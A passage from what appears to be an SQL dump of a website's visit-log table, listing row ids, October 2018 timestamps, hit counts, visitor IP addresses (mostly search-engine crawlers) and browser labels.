14499,1539034275,1,1,0,0,'54.36.148.233','other'),(314500,1539034571,1,1,0,0,'54.36.149.94','other'),(314501,1539034603,1,1,0,0,'91.242.162.38','other'),(314502,1539034614,1,1,0,0,'66.249.64.137','chrome'),(314503,1539034655,1,1,0,0,'54.36.148.86','other'),(314504,1539034986,1,1,0,0,'54.36.149.104','other'),(314505,1539035041,1,1,0,0,'54.36.148.219','other'),(314506,1539035591,1,1,0,0,'54.36.148.75','other'),(314507,1539036195,1,1,0,0,'66.249.64.131','chrome'),(314508,1539036418,1,1,0,0,'8.29.198.26','other'),(314509,1539036779,1,1,0,0,'54.36.148.34','other'),(314510,1539036987,1,1,0,0,'54.36.149.42','other'),(314511,1539037175,1,1,0,0,'185.191.204.2','chrome'),(314512,1539037179,1,1,0,0,'54.36.148.154','other'),(314513,1539037846,1,1,0,0,'54.36.148.169','other'),(314514,1539037903,1,1,0,0,'54.36.148.117','other'),(314515,1539038974,1,1,0,0,'66.249.64.137','chrome'),(314516,1539039215,1,1,0,0,'54.36.148.97','other'),(314517,1539039356,4,4,0,0,'66.249.64.135','chrome'),(314518,1539039367,1,1,0,0,'54.36.149.0','other'),(314519,1539039377,3,3,0,0,'66.249.64.131','chrome'),(314520,1539039430,1,1,0,0,'62.210.157.133','other'),(314521,1539039449,1,1,0,0,'193.106.30.98','firefox'),(314522,1539039494,1,1,0,0,'54.36.149.11','other'),(314523,1539039641,1,1,0,0,'54.36.148.185','other'),(314524,1539039784,1,1,0,0,'54.36.148.160','other'),(314525,1539040102,1,1,0,0,'54.36.149.69','other'),(314526,1539040321,3,3,0,0,'66.249.64.131','chrome'),(314527,1539040733,1,1,0,0,'54.36.148.83','other'),(314528,1539041212,2,2,0,0,'5.9.70.117','other'),(314529,1539041410,1,1,0,0,'54.36.148.103','other'),(314530,1539041561,1,1,0,0,'178.154.244.29','other'),(314531,1539041605,1,1,0,0,'66.249.70.25','chrome'),(314532,1539041667,1,1,0,0,'213.180.203.9','other'),(314533,1539041804,1,1,0,0,'54.36.149.100','other'),(314534,1539042004,1,1,0,0,'178.154.244.11','other'),(314535,1539042315,3,3,0,0,'66.249.64.137','chrome'),(314536,1539042359,1,1,0,0,'66.249.64.131','chrome'),(314537,1539042422,1,1,0,0,'8.29.198.26','other'),(314538,1539042446,1,1,0,0,'54.36.149.6','other'),(314539,1539042758,1,1,0,0,'8.29.198.25','other'),(314540,1539043050,1,1,0,0,'54.36.148.132','other'),(314541,1539043463,1,1,0,0,'54.36.148.119','other'),(314542,1539043513,1,1,0,0,'66.249.64.135','chrome'),(314543,1539043574,2,2,0,0,'216.244.66.241','other'),(314544,1539043598,1,1,0,0,'66.249.64.137','chrome'),(314545,1539043936,1,1,0,0,'54.36.149.54','other'),(314546,1539044262,1,1,0,0,'46.188.32.25','chrome'),(314547,1539044435,1,1,0,0,'54.36.148.120','other'),(314548,1539044477,1,1,0,0,'178.154.244.29','other'),(314549,1539044665,1,1,0,0,'54.36.148.20','other'),(314550,1539044688,1,1,0,0,'54.36.149.31','other'),(314551,1539044690,1,1,0,0,'54.36.148.103','other'),(314552,1539044759,1,1,0,0,'54.36.148.32','other'),(314553,1539044875,4,4,0,0,'66.249.64.131','chrome'),(314554,1539045019,1,1,0,0,'54.36.148.102','other'),(314555,1539045364,1,1,0,0,'66.249.64.135','chrome'),(314556,1539045487,1,1,0,0,'54.36.148.250','other'),(314557,1539045742,2,2,0,0,'66.249.64.137','chrome'),(314558,1539045787,1,1,0,0,'66.249.64.131','chrome'),(314559,1539045933,1,1,0,0,'54.36.148.59','other'),(314560,1539045951,1,1,0,0,'54.36.148.218','other'),(314561,1539046284,2,2,0,0,'178.154.244.29','other'),(314562,1539046514,1,1,0,0,'54.36.148.69','other'),(314563,1539046670,1,1,0,0,'54.36.148.41','other'),(314564,1539046951,1,1,0,0,'37.17.172.132','firefox'),(314565,1539046958,1,1,0,0,'180.76.15.138','other'),(314566,1539047037,2,2,0,0,'66.249.64.135','chrome'),(314567,1539047194,1,1,0,0,'54.36.149.94','other'),(314568,1539047219,2,2,0,0,'66.249.64.131','chrome'),(314569,1539047231,1,1,0,0,'66.249.64.221','chrome'),(314570,1539047250,1,1,0,0,'8.29.198.25','other'),(314571,1539047261,1,1,0,0,'54.36.148.49','other'),(314572,1539047550,1,1,0,0,'54.36.149.102','other'),(314573,1539047689,1,1,0,0,'54.36.148.201','other'),(314574,1539047754,1,1,0,0,'54.36.148.185','other'),(314575,1539047782,1,1,0,0,'54.36.149.25','other'),(314576,1539048071,1,1,0,0,'54.36.148.157','other'),(314577,1539048391,3,3,0,0,'66.249.64.131','chrome'),(314578,1539048726,1,1,0,0,'54.36.148.196','other'),(314579,1539048805,1,1,0,0,'54.36.148.129','other'),(314581,1539048909,1,1,0,0,'54.36.148.56','other'),(314582,1539049090,1,1,0,0,'66.249.64.135','chrome'),(314583,1539049255,3,3,0,0,'66.249.64.137','chrome'),(314584,1539049315,2,2,0,0,'66.249.64.131','chrome'),(314585,1539049360,1,1,0,0,'54.36.149.39','other'),(314586,1539050392,1,1,0,0,'54.36.148.245','other'),(314587,1539050424,2,2,0,0,'66.249.64.131','chrome'),(314588,1539050427,1,1,0,0,'54.36.148.170','other'),(314589,1539050438,1,1,0,0,'66.249.64.221','chrome'),(314590,1539050580,1,1,0,0,'54.36.148.67','other'),(314591,1539050689,1,1,0,0,'66.249.64.135','chrome'),(314592,1539051012,1,1,0,0,'54.36.148.46','other'),(314593,1539051028,1,1,0,0,'54.36.148.188','other'),(314594,1539051109,1,1,0,0,'66.249.64.137','chrome'),(314595,1539051141,1,1,0,0,'54.36.148.145','other'),(314596,1539051153,1,1,0,0,'66.249.64.219','chrome'),(314597,1539051282,1,1,0,0,'80.252.153.33','firefox'),(314598,1539051381,1,1,0,0,'54.36.149.0','other'),(314599,1539051649,1,1,0,0,'54.36.148.197','other'),(314600,1539051955,1,1,0,0,'54.36.148.24','other'),(314601,1539052304,1,1,0,0,'46.173.55.27','chrome'),(314602,1539052520,1,1,0,0,'66.249.64.137','chrome'),(314603,1539052918,1,1,0,0,'54.36.148.182','other'),(314604,1539053259,1,1,0,0,'8.29.198.27','other'),(314605,1539053372,1,1,0,0,'54.36.149.84','other'),(314606,1539053586,1,1,0,0,'8.29.198.25','other'),(314607,1539053735,1,1,0,0,'54.36.148.135','other'),(314608,1539053786,1,1,0,0,'54.36.148.119','other'),(314609,1539053803,4,4,0,0,'157.55.39.97','other'),(314610,1539054026,1,1,0,0,'54.36.148.95','other'),(314611,1539054053,1,1,0,0,'66.249.64.131','chrome'),(314612,1539054219,1,1,0,0,'46.229.168.141','other'),(314613,1539054221,1,1,0,0,'66.249.64.135','chrome'),(314614,1539054451,1,1,0,0,'54.36.149.36','other'),(314615,1539054626,1,1,0,0,'54.36.149.1','other'),(314616,1539054635,1,1,0,0,'54.36.148.187','other'),(314617,1539054875,1,1,0,0,'54.36.149.17','other'),(314618,1539054936,1,1,0,0,'66.249.64.137','chrome'),(314619,1539056441,1,1,0,0,'54.36.148.127','other'),(314620,1539056587,1,1,0,0,'54.36.148.14','other'),(314621,1539056653,1,1,0,0,'54.36.149.63','other'),(314622,1539056700,1,1,0,0,'157.55.39.93','other'),(314623,1539057161,1,1,0,0,'66.249.64.135','chrome'),(314624,1539057171,1,1,0,0,'54.36.148.209','other'),(314625,1539057320,1,1,0,0,'66.249.64.131','chrome'),(314626,1539057930,1,1,0,0,'80.252.153.33','chrome'),(314627,1539058082,1,1,0,0,'8.29.198.27','other'),(314628,1539058218,1,1,0,0,'54.36.149.46','other'),(314629,1539058292,1,1,0,0,'54.36.148.162','other'),(314630,1539058379,1,1,0,0,'54.36.148.142','other'),(314631,1539059960,1,1,0,0,'54.36.148.98','other'),(314632,1539059987,1,1,0,0,'54.36.148.188','other'),(314633,1539060473,1,1,0,0,'54.36.148.236','other'),(314634,1539061221,1,1,0,0,'54.36.149.102','other'),(314635,1539061447,1,1,0,0,'54.36.148.243','other'),(314636,1539061449,1,1,0,0,'54.36.149.84','other'),(314637,1539061479,1,1,0,0,'66.249.64.137','chrome'),(314638,1539061769,1,1,0,0,'54.36.148.47','other'),(314639,1539062168,1,1,0,0,'178.93.61.58','chrome'),(314640,1539062378,1,1,0,0,'54.36.148.29','other'),(314641,1539062882,1,1,0,0,'54.36.148.34','other'),(314642,1539062890,1,1,0,0,'78.111.190.224','chrome'),(314643,1539062983,1,1,0,0,'54.36.149.83','other'),(314644,1539063309,1,1,0,0,'54.36.148.98','other'),(314645,1539063861,1,1,0,0,'52.53.201.78','chrome'),(314646,1539064094,2,2,0,0,'8.29.198.26','other'),(314647,1539064213,1,1,0,0,'91.196.178.189','chrome'),(314648,1539064256,27,27,0,0,'46.4.67.206','other'),(314649,1539064587,1,1,0,0,'54.36.148.173','other'),(314650,1539064645,1,1,0,0,'91.196.178.91','firefox'),(314651,1539064804,1,1,0,0,'54.36.148.163','other'),(314652,1539064846,2,2,0,0,'216.244.66.241','other'),(314653,1539065194,1,1,0,0,'107.21.1.8','other'),(314654,1539065458,1,1,0,0,'46.229.168.134','other'),(314655,1539065583,1,1,0,0,'54.36.149.52','other'),(314656,1539066014,1,1,0,0,'91.196.178.93','chrome'),(314657,1539066107,1,1,0,0,'54.36.148.249','other'),(314658,1539066663,1,1,0,0,'54.36.148.169','other'),(314659,1539066683,1,1,0,0,'157.55.39.93','other'),(314660,1539066856,1,1,0,0,'54.36.148.196','other'),(314661,1539067154,1,1,0,0,'54.36.148.51','other'),(314662,1539067563,4,4,0,0,'216.244.66.241','other'),(314663,1539067564,1,1,0,0,'31.184.238.34','chrome'),(314664,1539067738,1,1,0,0,'66.249.64.137','chrome'),(314665,1539067805,1,1,0,0,'54.36.149.42','other'),(314666,1539067865,1,1,0,0,'157.55.39.93','other'),(314667,1539067966,1,1,0,0,'54.36.149.59','other'),(314668,1539068312,1,1,0,0,'54.36.149.11','other'),(314669,1539068602,1,1,0,0,'37.53.96.185','chrome'),(314670,1539068908,1,1,0,0,'8.29.198.26','other'),(314671,1539068997,1,1,0,0,'54.36.148.48','other'),(314672,1539069291,1,1,0,0,'54.36.149.40','other'),(314673,1539069445,1,1,0,0,'54.36.148.86','other'),(314674,1539069576,1,1,0,0,'5.83.18.86','chrome'),(314675,1539069661,1,1,0,0,'54.36.149.73','other'),(314676,1539069730,1,1,0,0,'37.53.96.185','chrome'),(314677,1539070030,2,2,0,0,'195.5.18.3','chrome'),(314678,1539070131,1,1,0,0,'91.196.178.175','chrome'),(314679,1539070149,1,1,0,0,'54.36.148.59','other'),(314680,1539070579,1,1,0,0,'54.36.149.70','other'),(314681,1539071033,1,1,0,0,'54.36.148.181','other'),(314682,1539071266,1,1,0,0,'178.93.61.58','chrome'),(314683,1539071491,1,1,0,0,'54.36.148.161','other'),(314684,1539071752,1,1,0,0,'54.36.149.97','other'),(314685,1539072442,1,1,0,0,'54.36.148.133','other'),(314686,1539072565,1,1,0,0,'54.36.148.46','other'),(314687,1539072685,1,1,0,0,'54.36.149.71','other'),(314688,1539073014,1,1,0,0,'37.55.223.41','chrome'),(314689,1539073207,1,1,0,0,'54.36.149.53','other'),(314690,1539073922,1,1,0,0,'180.76.15.149','other'),(314691,1539074105,1,1,0,0,'54.36.148.121','other'),(314692,1539074153,1,1,0,0,'91.210.109.207','firefox'),(314693,1539074155,1,1,0,0,'66.249.64.137','chrome'),(314694,1539074674,1,1,0,0,'207.46.13.84','other'),(314695,1539074755,1,1,0,0,'46.229.168.132','other'),(314696,1539074955,1,1,0,0,'8.29.198.27','other'),(314697,1539075062,1,1,0,0,'54.36.148.173','other'),(314698,1539075253,1,1,0,0,'8.29.198.26','other'),(314699,1539075514,1,1,0,0,'89.111.34.211','chrome'),(314700,1539075533,1,1,0,0,'54.36.148.133','other'),(314701,1539075595,1,1,0,0,'54.36.148.140','other'),(314702,1539075715,1,1,0,0,'54.36.149.41','other'),(314703,1539075845,1,1,0,0,'66.249.64.135','chrome'),(314704,1539076201,1,1,0,0,'91.196.178.134','chrome'),(314705,1539076248,1,1,0,0,'5.45.207.79','other'),(314706,1539076249,1,1,0,0,'178.154.244.29','other'),(314707,1539076338,1,1,0,0,'54.36.148.76','other'),(314708,1539076402,1,1,0,0,'46.229.168.143','other'),(314709,1539077179,1,1,0,0,'54.36.148.97','other'),(314710,1539077381,1,1,0,0,'54.36.148.43','other'),(314711,1539077534,1,1,0,0,'37.55.223.41','chrome'),(314712,1539078045,1,1,0,0,'95.133.48.135','chrome'),(314713,1539078070,1,1,0,0,'216.244.66.241','other'),(314714,1539078711,1,1,0,0,'54.36.148.24','other'),(314715,1539078754,1,1,0,0,'46.229.168.131','other'),(314716,1539079003,1,1,0,0,'54.36.148.130','other'),(314717,1539079741,1,1,0,0,'8.29.198.27','other'),(314718,1539079964,1,1,0,0,'207.46.13.199','other'),(314719,1539080004,1,1,0,0,'54.36.149.94','other'),(314720,1539080123,1,1,0,0,'95.163.255.96','other'),(314721,1539080555,1,1,0,0,'157.55.39.93','other'),(314722,1539081054,1,1,0,0,'54.36.149.65','other'),(314723,1539081254,1,1,0,0,'54.36.149.32','other'),(314724,1539081272,1,1,0,0,'54.36.148.128','other'),(314725,1539081313,1,1,0,0,'54.36.148.170','other'),(314726,1539081358,1,1,0,0,'66.249.64.135','chrome'),(314727,1539081788,1,1,0,0,'95.163.255.97','other'),(314728,1539082105,1,1,0,0,'54.36.148.103','other'),(314729,1539082128,1,1,0,0,'54.36.149.64','other'),(314730,1539082331,1,1,0,0,'54.36.148.172','other'),(314731,1539082648,1,1,0,0,'54.36.148.171','other'),(314732,1539083436,2,2,0,0,'178.154.244.29','other'),(314733,1539083794,1,1,0,0,'87.250.224.47','other'),(314734,1539083906,1,1,0,0,'54.36.148.179','other'),(314735,1539083937,1,1,0,0,'95.108.181.75','other'),(314736,1539083964,1,1,0,0,'178.154.244.11','other'),(314737,1539083987,1,1,0,0,'216.244.66.241','other'),(314738,1539084066,1,1,0,0,'178.154.200.48','other'),(314739,1539084271,1,1,0,0,'141.8.142.108','other'),(314740,1539084365,1,1,0,0,'37.9.113.20','other'),(314741,1539084548,1,1,0,0,'93.74.232.137','firefox'),(314742,1539084582,1,1,0,0,'54.36.148.206','other'),(314743,1539084731,1,1,0,0,'95.108.181.54','other'),(314744,1539084949,3,3,0,0,'178.154.244.29','other'),(314745,1539084961,1,1,0,0,'66.249.64.137','chrome'),(314746,1539085008,1,1,0,0,'66.249.64.131','chrome'),(314747,1539085027,2,2,0,0,'178.154.244.11','other'),(314748,1539085471,1,1,0,0,'37.9.113.148','other'),(314749,1539085566,1,1,0,0,'54.36.148.80','other'),(314750,1539085743,1,1,0,0,'54.36.148.37','other'),(314751,1539085797,2,2,0,0,'8.29.198.27','other'),(314752,1539085935,1,1,0,0,'37.9.113.20','other'),(314753,1539085940,1,1,0,0,'54.36.148.186','other'),(314754,1539086009,1,1,0,0,'5.45.207.79','other'),(314755,1539086103,3,3,0,0,'178.154.244.11','other'),(314756,1539086276,2,2,0,0,'176.102.195.10','chrome'),(314757,1539086424,2,2,0,0,'66.249.64.131','chrome'),(314758,1539086549,1,1,0,0,'66.249.64.135','chrome'),(314759,1539086705,1,1,0,0,'37.53.154.127','chrome'),(314760,1539086750,2,2,0,0,'66.249.64.137','chrome'),(314761,1539087057,1,1,0,0,'37.9.113.148','other'),(314762,1539087100,2,2,0,0,'5.45.207.19','other'),(314763,1539087342,5,5,0,0,'178.154.244.29','other'),(314764,1539087449,3,3,0,0,'5.45.207.79','other'),(314765,1539087529,1,1,0,0,'54.36.149.106','other'),(314766,1539087595,1,1,0,0,'54.36.148.168','other'),(314767,1539087926,1,1,0,0,'141.8.142.103','other'),(314768,1539088265,5,5,0,0,'178.154.244.11','other'),(314769,1539088322,1,1,0,0,'54.36.148.94','other'),(314770,1539088326,1,1,0,0,'78.111.186.35','chrome'),(314771,1539088464,2,2,0,0,'5.45.207.79','other'),(314772,1539088545,1,1,0,0,'5.45.207.19','other'),(314773,1539088549,4,4,0,0,'178.154.244.29','other'),(314774,1539088704,1,1,0,0,'66.249.64.131','chrome'),(314775,1539088767,1,1,0,0,'54.36.149.73','other'),(314776,1539088869,1,1,0,0,'87.250.224.47','other'),(314777,1539089085,1,1,0,0,'54.36.148.30','other'),(314778,1539089127,2,2,0,0,'178.95.67.148','chrome'),(314779,1539089240,1,1,0,0,'66.102.9.38','chrome'),(314780,1539090325,1,1,0,0,'54.36.148.152','other'),(314781,1539090360,1,1,0,0,'54.36.149.40','other'),(314782,1539090418,1,1,0,0,'66.249.64.137','chrome'),(314783,1539090545,1,1,0,0,'178.154.244.29','other'),(314784,1539090580,1,1,0,0,'8.29.198.27','other'),(314785,1539090781,1,1,0,0,'54.36.148.56','other'),(314786,1539091404,1,1,0,0,'54.36.148.146','other'),(314787,1539091703,2,2,0,0,'66.249.64.131','chrome'),(314788,1539091749,1,1,0,0,'95.134.22.45','chrome'),(314789,1539092012,3,3,0,0,'66.249.64.137','chrome'),(314790,1539092120,1,1,0,0,'54.36.148.80','other'),(314791,1539092390,1,1,0,0,'66.249.64.135','chrome'),(314792,1539092543,1,1,0,0,'54.36.149.4','other'),(314793,1539092693,3,3,0,0,'216.244.66.241','other'),(314794,1539092759,1,1,0,0,'54.36.148.19','other'),(314795,1539093059,1,1,0,0,'54.36.148.184','other'),(314796,1539093239,1,1,0,0,'91.196.103.35','chrome'),(314797,1539093608,1,1,0,0,'178.154.244.29','other'),(314798,1539093619,1,1,0,0,'66.249.64.137','chrome'),(314799,1539093863,1,1,0,0,'54.36.148.51','other'),(314800,1539094913,1,1,0,0,'54.36.148.134','other'),(314801,1539095231,1,1,0,0,'66.249.64.221','chrome'),(314802,1539095264,2,2,0,0,'216.244.66.241','other'),(314803,1539095291,1,1,0,0,'66.249.64.217','chrome'),(314804,1539095655,1,1,0,0,'91.196.178.190','chrome'),(314805,1539095796,1,1,0,0,'66.249.64.137','chrome'),(314806,1539095875,1,1,0,0,'180.76.15.10','other'),(314807,1539096010,1,1,0,0,'66.249.64.135','chrome'),(314808,1539096018,1,1,0,0,'54.36.149.67','other'),(314809,1539096396,1,1,0,0,'91.196.103.35','chrome'),(314810,1539096638,2,2,0,0,'8.29.198.26','other'),(314811,1539096672,1,1,0,0,'54.36.149.103','other'),(314812,1539097398,1,1,0,0,'54.36.148.97','other'),(314813,1539097942,1,1,0,0,'66.249.64.135','chrome'),(314814,1539098014,1,1,0,0,'54.36.148.24','other'),(314815,1539098366,1,1,0,0,'54.36.148.255','other'),(314816,1539098506,1,1,0,0,'91.196.178.134','chrome'),(314817,1539099134,1,1,0,0,'54.165.59.7','other'),(314818,1539099238,1,1,0,0,'66.249.64.135','chrome'),(314819,1539099453,1,1,0,0,'216.244.66.241','other'),(314820,1539100147,1,1,0,0,'54.36.149.69','other'),(314821,1539100317,5,5,0,0,'134.249.50.5','other'),(314822,1539100348,1,1,0,0,'193.106.30.98','firefox'),(314823,1539100701,1,1,0,0,'54.165.59.7','other'),(314824,1539100709,1,1,0,0,'54.36.149.44','other'),(314825,1539100969,1,1,0,0,'54.36.148.200','other'),(314826,1539101275,1,1,0,0,'216.244.66.241','other'),(314827,1539101414,1,1,0,0,'8.29.198.27','other'),(314828,1539101761,1,1,0,0,'66.249.64.137','chrome'),(314829,1539101780,1,1,0,0,'94.180.177.10','chrome'),(314830,1539101884,3,3,0,0,'54.165.59.7','other'),(314831,1539101940,1,1,0,0,'54.36.148.72','other'),(314832,1539102005,1,1,0,0,'54.36.148.116','other'),(314833,1539102052,1,1,0,0,'54.36.148.158','other'),(314834,1539102835,1,1,0,0,'54.36.148.135','other'),(314835,1539102915,1,1,0,0,'54.36.149.48','other'),(314836,1539102965,1,1,0,0,'95.163.255.97','other'),(314837,1539103887,1,1,0,0,'207.46.13.199','other'),(314838,1539103897,1,1,0,0,'54.36.148.189','other'),(314839,1539104255,1,1,0,0,'37.54.23.36','chrome'),(314840,1539104506,1,1,0,0,'54.36.148.33','other'),(314841,1539104697,7,7,0,0,'40.77.167.25','other'),(314842,1539104736,1,1,0,0,'54.36.148.191','other'),(314843,1539104738,10,10,0,0,'40.77.167.113','other'),(314844,1539104785,1,1,0,0,'54.36.149.37','other'),(314845,1539104862,1,1,0,0,'66.249.64.131','chrome'),(314846,1539104919,8,8,0,0,'207.46.13.199','other'),(314847,1539105510,1,1,0,0,'54.36.148.141','other'),(314848,1539105829,1,1,0,0,'54.165.59.7','other'),(314849,1539105835,1,1,0,0,'91.196.178.83','firefox'),(314850,1539105883,1,1,0,0,'54.36.148.20','other'),(314851,1539106191,1,1,0,0,'54.36.149.82','other'),(314852,1539106350,1,1,0,0,'46.229.168.138','other'),(314853,1539106452,1,1,0,0,'54.36.148.113','other'),(314854,1539106547,1,1,0,0,'54.36.148.235','other'),(314855,1539106951,1,1,0,0,'54.36.148.137','other'),(314856,1539106972,1,1,0,0,'54.36.149.97','other'),(314857,1539106988,1,1,0,0,'54.36.148.162','other'),(314858,1539107293,1,1,0,0,'66.249.64.219','chrome'),(314859,1539107476,1,1,0,0,'8.29.198.25','other'),(314860,1539107616,1,1,0,0,'54.36.149.61','other'),(314861,1539107650,11,11,0,0,'40.77.167.78','other'),(314862,1539107692,1,1,0,0,'40.77.167.113','other'),(314863,1539107752,1,1,0,0,'8.29.198.26','other'),(314864,1539108241,1,1,0,0,'54.36.149.29','other'),(314865,1539108730,2,2,0,0,'54.165.59.7','other'),(314866,1539109087,1,1,0,0,'91.196.178.103','chrome'),(314867,1539109299,1,1,0,0,'54.36.148.250','other'),(314868,1539109418,1,1,0,0,'66.249.64.135','chrome'),(314869,1539109454,1,1,0,0,'54.36.149.101','other'),(314870,1539110007,1,1,0,0,'54.36.148.42','other'),(314871,1539110390,1,1,0,0,'54.36.149.16','other'),(314872,1539110469,1,1,0,0,'54.36.148.101','other'),(314873,1539110477,1,1,0,0,'54.36.148.115','other'),(314874,1539111076,1,1,0,0,'54.36.149.13','other'),(314875,1539111164,2,2,0,0,'95.133.152.51','chrome'),(314876,1539111265,1,1,0,0,'66.249.64.131','chrome'),(314877,1539111338,1,1,0,0,'178.154.244.11','other'),(314878,1539111339,1,1,0,0,'178.154.244.29','other'),(314879,1539111647,1,1,0,0,'54.36.149.105','other'),(314880,1539111653,1,1,0,0,'95.163.255.92','other'),(314881,1539111996,1,1,0,0,'66.249.64.135','chrome'),(314882,1539112018,1,1,0,0,'54.36.149.42','other'),(314883,1539112239,1,1,0,0,'8.29.198.26','other'),(314884,1539112808,1,1,0,0,'207.46.13.161','other'),(314885,1539112963,1,1,0,0,'54.36.148.212','other'),(314886,1539113198,2,2,0,0,'216.244.66.241','other'),(314887,1539113503,1,1,0,0,'46.229.168.137','other'),(314888,1539113687,1,1,0,0,'66.249.64.219','chrome'),(314889,1539113843,1,1,0,0,'178.255.215.94','other'),(314890,1539114343,1,1,0,0,'54.36.148.193','other'),(314891,1539114419,1,1,0,0,'54.36.149.51','other'),(314892,1539115248,1,1,0,0,'54.36.149.83','other'),(314893,1539115630,1,1,0,0,'207.46.13.199','other'),(314894,1539115828,1,1,0,0,'66.249.64.135','chrome'),(314895,1539116064,1,1,0,0,'54.36.148.226','other'),(314896,1539116425,1,1,0,0,'51.255.65.46','other'),(314897,1539117017,1,1,0,0,'40.77.167.10','other'),(314898,1539117478,1,1,0,0,'66.249.64.131','chrome'),(314899,1539117709,1,1,0,0,'54.36.148.204','other'),(314900,1539118093,1,1,0,0,'54.36.149.57','other'),(314901,1539118257,1,1,0,0,'40.77.167.10','other'),(314902,1539118317,2,2,0,0,'8.29.198.26','other'),(314903,1539118628,1,1,0,0,'54.36.148.27','other'),(314904,1539118953,1,1,0,0,'178.255.215.94','other'),(314905,1539119236,1,1,0,0,'54.36.148.38','other'),(314906,1539120370,1,1,0,0,'66.249.64.135','chrome'),(314907,1539120450,1,1,0,0,'54.36.149.37','other'),(314908,1539120939,1,1,0,0,'185.189.114.123','chrome'),(314909,1539121189,1,1,0,0,'180.76.15.138','other'),(314910,1539121426,2,2,0,0,'66.249.64.135','chrome'),(314911,1539121435,2,2,0,0,'66.249.64.131','chrome'),(314912,1539121776,1,1,0,0,'216.244.66.241','other'),(314913,1539123073,1,1,0,0,'8.29.198.27','other'),(314914,1539123559,1,1,0,0,'54.36.149.77','other'),(314915,1539124032,1,1,0,0,'40.77.167.10','other'),(314916,1539124250,1,1,0,0,'178.255.215.94','other'),(314917,1539124363,1,1,0,0,'54.36.148.169','other'),(314918,1539124415,1,1,0,0,'54.36.148.80','other'),(314919,1539124655,2,2,0,0,'178.154.244.29','other'),(314920,1539124864,1,1,0,0,'54.36.148.76','other'),(314921,1539125024,1,1,0,0,'54.36.149.41','other'),(314922,1539125280,2,2,0,0,'54.36.148.171','other'),(314923,1539125327,1,1,0,0,'54.36.149.63','other'),(314924,1539125476,2,2,0,0,'216.244.66.241','other'),(314925,1539125747,1,1,0,0,'109.70.100.18','other'),(314926,1539125876,1,1,0,0,'163.172.32.173','other'),(314927,1539125935,1,1,0,0,'54.36.148.113','other'),(314928,1539126294,1,1,0,0,'66.249.64.131','chrome'),(314929,1539126463,4,4,0,0,'216.244.66.241','other'),(314930,1539126476,1,1,0,0,'54.36.148.64','other'),(314931,1539128275,1,1,0,0,'54.36.149.24','other'),(314932,1539128426,1,1,0,0,'95.163.255.98','other'),(314933,1539128788,1,1,0,0,'37.9.113.103','other'),(314934,1539128838,1,1,0,0,'54.36.148.217','other'),(314935,1539128843,3,3,0,0,'178.154.244.29','other'),(314936,1539128847,1,1,0,0,'87.250.224.47','other'),(314937,1539128910,1,1,0,0,'46.229.168.146','other'),(314938,1539128965,1,1,0,0,'178.154.244.11','other'),(314939,1539129153,1,1,0,0,'8.29.198.25','other'),(314940,1539129234,1,1,0,0,'5.45.207.19','other'),(314941,1539129414,1,1,0,0,'8.29.198.26','other'),(314942,1539129431,1,1,0,0,'66.249.64.131','chrome'),(314943,1539129647,1,1,0,0,'216.244.66.241','other'),(314944,1539129844,1,1,0,0,'54.36.149.4','other'),(314945,1539129963,1,1,0,0,'66.249.64.135','chrome'),(314946,1539130115,3,3,0,0,'178.154.244.29','other'),(314947,1539130505,1,1,0,0,'87.250.224.47','other'),(314948,1539130603,1,1,0,0,'37.9.113.148','other'),(314949,1539130620,1,1,0,0,'178.154.244.11','other'),(314950,1539130811,1,1,0,0,'54.36.148.20','other'),(314951,1539131070,1,1,0,0,'46.229.168.137','other'),(314952,1539132216,1,1,0,0,'54.36.148.88','other'),(314953,1539132424,1,1,0,0,'54.36.148.208','other'),(314954,1539132655,1,1,0,0,'54.36.148.209','other'),(314955,1539132855,1,1,0,0,'54.36.148.84','other'),(314956,1539133005,1,1,0,0,'54.36.148.117','other'),(314957,1539133303,1,1,0,0,'54.36.148.169','other'),(314958,1539133671,1,1,0,0,'66.249.64.137','chrome'),(314959,1539133806,1,1,0,0,'66.249.64.131','chrome'),(314960,1539133905,1,1,0,0,'8.29.198.27','other'),(314961,1539134043,1,1,0,0,'54.36.148.131','other'),(314962,1539134907,1,1,0,0,'54.36.149.10','other'),(314963,1539135040,1,1,0,0,'66.249.64.219','chrome'),(314964,1539135171,1,1,0,0,'66.249.64.131','chrome'),(314965,1539135918,1,1,0,0,'54.36.148.43','other'),(314966,1539136419,1,1,0,0,'66.249.64.135','chrome'),(314967,1539136480,1,1,0,0,'54.36.148.229','other'),(314968,1539136677,1,1,0,0,'54.36.148.226','other'),(314969,1539137400,2,2,0,0,'66.249.64.131','chrome'),(314970,1539137816,1,1,0,0,'66.249.64.135','chrome'),(314971,1539138685,1,1,0,0,'54.36.149.107','other'),(314972,1539139143,2,2,0,0,'66.249.64.137','chrome'),(314973,1539139414,1,1,0,0,'54.36.149.106','other'),(314974,1539139991,1,1,0,0,'8.29.198.26','other'),(314975,1539140244,1,1,0,0,'8.29.198.27','other'),(314976,1539140305,1,1,0,0,'54.36.148.238','other'),(314977,1539140757,1,1,0,0,'66.249.64.131','chrome'),(314978,1539140797,1,1,0,0,'54.36.148.115','other'),(314979,1539141171,1,1,0,0,'66.249.64.137','chrome'),(314980,1539141742,1,1,0,0,'54.36.148.174','other'),(314981,1539142286,1,0,1,0,'66.249.64.135',''),(314982,1539142441,1,1,0,0,'216.244.66.241','other'),(314983,1539142530,1,1,0,0,'46.229.168.133','other'),(314984,1539142673,1,0,1,0,'66.249.64.217',''),(314985,1539142680,1,1,0,0,'54.36.149.47','other'),(314986,1539143856,1,1,0,0,'216.244.66.241','other'),(314987,1539144122,1,1,0,0,'66.249.64.137','chrome'),(314988,1539144201,1,1,0,0,'87.250.224.47','other'),(314989,1539144208,3,3,0,0,'178.154.244.11','other'),(314990,1539144742,1,1,0,0,'8.29.198.25','other'),(314991,1539144863,1,1,0,0,'157.55.39.164','other'),(314992,1539144988,2,2,0,0,'216.244.66.241','other'),(314993,1539145334,1,1,0,0,'207.46.13.39','other'),(314994,1539147751,1,1,0,0,'216.244.66.241','other'),(314995,1539148049,1,1,0,0,'207.46.13.39','other'),(314996,1539148066,2,2,0,0,'66.249.64.135','chrome'),(314997,1539148187,1,1,0,0,'66.249.64.217','chrome'),(314998,1539149440,1,1,0,0,'66.249.64.135','chrome'),(314999,1539149653,47,47,0,0,'144.76.38.10','other'),(315000,1539150284,1,1,0,0,'216.244.66.241','other'),(315001,1539150827,2,2,0,0,'8.29.198.25','other'),(315002,1539151078,1,1,0,0,'46.229.168.145','other'),(315003,1539151531,1,1,0,0,'91.196.178.71','chrome'),(315004,1539151985,2,2,0,0,'91.196.178.168','chrome'),(315005,1539152602,1,1,0,0,'5.45.207.19','other'),(315006,1539152605,1,1,0,0,'178.154.244.29','other'),(315007,1539152728,1,1,0,0,'207.46.13.39','other'),(315008,1539152981,1,